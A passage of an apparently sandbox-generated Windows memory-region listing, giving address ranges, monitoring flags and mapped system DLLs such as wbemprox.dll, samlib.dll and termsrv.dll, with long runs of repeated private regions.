(normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2552 start_va = 0x6d6b0000 end_va = 0x6d716fff monitored = 0 entry_point = 0x6d6cb610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3099 start_va = 0x38e0000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 3100 start_va = 0x3920000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003920000" filename = "" Region: id = 3101 start_va = 0x3a20000 end_va = 0x3a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a20000" filename = "" Region: id = 3102 start_va = 0x3a60000 end_va = 0x3b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a60000" filename = "" Region: id = 3103 start_va = 0x3b60000 end_va = 0x3b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b60000" filename = "" Region: id = 3104 start_va = 0x3ba0000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ba0000" filename = "" Region: id = 3107 start_va = 0x6d690000 end_va = 0x6d6a0fff monitored = 0 entry_point = 0x6d698fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3116 start_va = 0x6d5d0000 end_va = 0x6d68efff monitored = 0 entry_point = 0x6d601e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3220 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 3221 start_va = 0x3ca0000 end_va = 0x40aafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 3222 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 3223 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 3224 start_va = 0x40b0000 end_va = 0x40b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3225 start_va = 0x40c0000 end_va = 0x40c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 3226 start_va = 0x40d0000 end_va = 0x40d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3227 start_va = 0x40d0000 end_va = 0x40d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3228 start_va = 0x40d0000 end_va = 0x40d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3229 start_va = 0x40e0000 end_va = 0x40e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 3230 start_va = 0x40f0000 end_va = 0x40f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3231 start_va = 0x4100000 end_va = 0x4100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 3232 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 3233 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 3234 start_va = 0x40b0000 end_va = 0x40effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 3235 start_va = 0x40f0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 3236 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 3237 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 3238 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 3239 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 3240 start_va = 0x41f0000 end_va = 0x45f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 3248 start_va = 0x4600000 end_va = 0x4746fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 3249 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 3250 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 3251 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 3252 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 3253 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 3254 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3255 start_va = 0x4750000 end_va = 0x4750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 3256 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 3257 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 3258 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 3259 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3260 start_va = 0x4750000 end_va = 0x4750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 3261 start_va = 0x4760000 end_va = 0x4760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 3262 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3263 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 3264 start_va = 0x6d4d0000 end_va = 0x6d4e2fff monitored = 0 entry_point = 0x6d4d5c60 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 3265 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3266 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3267 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3268 start_va = 0x4750000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 3269 start_va = 0x4790000 end_va = 0x488ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 3271 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3272 start_va = 0x4890000 end_va = 0x4890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 3273 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3274 start_va = 0x48a0000 end_va = 0x48a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 3275 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3291 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3292 start_va = 0x4890000 end_va = 0x4890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 3293 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3298 start_va = 0x48a0000 end_va = 0x499ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048a0000" filename = "" Region: id = 3301 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3302 start_va = 0x4890000 end_va = 0x4890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 3303 start_va = 0x49a0000 end_va = 0x49a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 3304 start_va = 0x49a0000 end_va = 0x49a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 3305 start_va = 0x49b0000 end_va = 0x49b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 3306 start_va = 0x49b0000 end_va = 0x49b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 3307 start_va = 0x49c0000 end_va = 0x49c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 3308 start_va = 0x49d0000 end_va = 0x49d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 3310 start_va = 0x49e0000 end_va = 0x4adcfff monitored = 0 entry_point = 0x4a14b00 region_type = mapped_file name = "termsrv.dll" filename = "\\Windows\\System32\\termsrv.dll" (normalized: "c:\\windows\\system32\\termsrv.dll") Region: id = 3311 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3312 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3313 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3314 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3315 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3316 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3317 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3319 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3320 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3321 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3322 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3323 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3324 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3325 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3326 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3327 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3328 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3329 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3330 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3331 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3332 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3333 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3334 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3335 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3336 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3337 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3338 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3339 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3340 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3341 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3342 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3343 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3344 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3345 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3346 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3347 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3348 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3350 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3351 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3352 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3353 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3354 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3355 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3356 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3357 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3358 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3359 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3360 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3361 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3362 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3363 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3364 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3365 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3366 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3367 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3368 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3369 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3370 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3371 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3372 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3373 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3374 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3375 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3377 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3378 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3379 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3380 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3381 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3382 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3383 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3384 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3385 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3386 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3387 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3388 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3389 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3390 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3391 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3392 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3393 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3394 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3395 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3396 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3397 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3398 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3399 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3400 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3401 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3402 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3403 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3404 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3405 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3406 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3407 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3408 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3409 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3410 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3411 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3412 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3413 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3414 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3415 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3416 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3417 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3418 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3419 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3420 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3421 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3422 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3423 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3424 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3425 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3426 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3427 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3428 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3429 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3430 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3431 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3432 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3433 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3434 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3435 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3436 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3437 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3438 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3439 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3440 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3441 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3442 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3443 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3444 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3445 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 3446 start_va = 0x3790000 end_va = 